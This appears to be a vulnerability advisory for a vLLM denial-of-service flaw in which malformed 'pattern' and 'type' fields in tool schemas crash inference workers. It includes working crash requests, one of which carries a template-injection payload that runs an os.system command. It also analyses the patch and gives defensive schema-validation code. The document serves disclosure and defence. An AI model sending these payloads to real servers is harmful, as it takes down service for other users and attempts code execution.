```json
{
  "model": "mistral-nemo-instruct",
  "messages": [{ "role": "user", "content": "crash via type" }],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "crash01",
        "parameters": {
          "type": "object",
          "properties": {
            "a": { "type": "something" }
          }
        }
      }
    }
  ],
  "tool_choice": {
    "type": "function",
    "function": {
      "name": "crash01",
      "arguments": { "a": "test" }
    }
  },
  "stream": false,
  "max_tokens": 1
}
```
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to an RCE payload; it could have just been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.
```http
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
```
```json
{
  "model": "mistral-nemo-instruct",
  "messages": [
    { "role": "user", "content": "Crash via Pattern" }
  ],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "crash02",
        "parameters": {
          "type": "object",
          "properties": {
            "a": {
              "type": "string",
              "pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
            }
          }
        }
      }
    }
  ],
  "tool_choice": {
    "type": "function",
    "function": { "name": "crash02" }
  },
  "stream": false,
  "max_tokens": 32,
  "temperature": 0.2,
  "top_p": 1,
  "n": 1
}
```
Backend workers can be crashed, causing anyone using the inference engine to get 500 internal server errors on subsequent requests.
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| vllm | pip | >= 0.8.0, < 0.9.0 | 0.9.0 |
The vulnerability (GHSA-vrq3-r879-7m65) describes a Denial of Service in vLLM's /v1/chat/completions endpoint due to improper validation of pattern and type fields in tool schemas. Malformed pattern fields can crash the C++ regex_converter.cc, and unsupported type fields can crash json_schema_converter.cc.
The provided fix (PR #18454, commits 2d9ca06... and 8de207a...) primarily involves replacing Python's standard re library with the regex library across various files. This change is aimed at improving regex parsing performance and preventing catastrophic backtracking (ReDoS), which directly addresses the DoS vector for the pattern field if Python's regex engine is involved in its processing.
The ServingChat.chat_completion method in vllm/entrypoints/openai/serving_chat.py is the entry point that receives the user request containing tool definitions. If this method, or helper functions it calls that share the module's `import regex as re`, compile or process the pattern from a tool's JSON schema using Python's regex engine, the switch to the regex library serves as a mitigation. This is because the regex library is generally more robust against malformed patterns and ReDoS attacks than the standard re module.
Similarly, if the XGrammarLogitsProcessor (used for JSON schema-based guided decoding) processes schemas containing pattern fields, and if the underlying xgrammar library or operations within XGrammarLogitsProcessor were to use Python's regex engine, the patch to xgrammar_decoding.py (importing regex as re) would apply. However, the link here is less direct as xgrammar is an external library.
It's important to note that the provided patches (switching re to regex) do not appear to directly address the vulnerability related to the type field and the json_schema_converter.cc crash. The fix for that aspect might be in a different patch or was not included in the provided commit information. The analysis here focuses on the impact of the re -> regex change on the pattern field vulnerability.
The root cause for the pattern-related DoS is the lack of sufficient validation before passing a user-controlled regex pattern to a regex engine, which could be either Python's engine (now regex) or a C++ component like regex_converter.cc. The patch strengthens the Python-side regex handling.
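One way to gate tool schemas before they reach either converter, as an added example that is not vLLM's code or the fix in the PR. The names `schema_problems`, `pattern_problem`, `MAX_PATTERN_LEN` and the brace-quantifier rule are assumptions: the rule is deliberately stricter than Python's `re`, which compiles `{{}}` without error, and it is not a description of what `regex_converter.cc` accepts.

```python
import re

# JSON Schema's primitive type names; anything else (e.g. "something") is refused.
ALLOWED_TYPES = {"string", "number", "integer", "boolean", "object", "array", "null"}
MAX_PATTERN_LEN = 256  # assumed limit, not a vLLM setting
# Matches an escaped char, or a "{" that does not open {n}, {n,} or {n,m}.
_BRACE = re.compile(r"\\.|\{(?!\d+(?:,\d*)?\})")
NAMED = ("properties", "$defs", "definitions")  # maps of name -> subschema
NESTED = ("items", "prefixItems", "additionalProperties", "not", "anyOf", "oneOf", "allOf")
# Constructed sample: a tool's "parameters" schema with both bad fields from the page.
SAMPLE = {"type": "object", "properties": {
    "a": {"type": "something"},
    "b": {"type": "string", "pattern": "{{}}"},
    "c": {"type": "string", "pattern": "^[a-z]{2,8}$"}}}


def pattern_problem(pattern):
    """Return why a pattern is refused, or None if it passes this gate."""
    if not isinstance(pattern, str) or len(pattern) > MAX_PATTERN_LEN:
        return "not a string, or too long"
    for m in _BRACE.finditer(pattern):
        if m.group().startswith("{"):  # escaped characters are skipped
            return f"stray '{{' at offset {m.start()}"
    try:
        re.compile(pattern)
    except re.error as exc:
        return f"does not compile: {exc}"
    return None


def schema_problems(schema, path="$"):
    """Recursively collect unsupported 'type' and refused 'pattern' values."""
    if isinstance(schema, list):
        return [p for i, s in enumerate(schema) for p in schema_problems(s, f"{path}[{i}]")]
    if not isinstance(schema, dict):
        return []
    out = []
    declared = schema.get("type", [])
    for t in declared if isinstance(declared, list) else [declared]:
        if not isinstance(t, str) or t not in ALLOWED_TYPES:
            out.append(f"{path}.type: unsupported {t!r}")
    if "pattern" in schema and (why := pattern_problem(schema["pattern"])):
        out.append(f"{path}.pattern: {why}")
    for key in NAMED:
        sub = schema.get(key)
        for name, child in sub.items() if isinstance(sub, dict) else ():
            out += schema_problems(child, f"{path}.{key}.{name}")
    for key in NESTED:
        out += schema_problems(schema.get(key), f"{path}.{key}")
    return out
```

Call `schema_problems` on each tool's `function.parameters` and answer with a 400 when the list is non-empty, so a malformed schema is refused at the API layer instead of reaching a worker. A literal `{` inside a character class is also refused by this rule; escape it as `\{` in patterns you control.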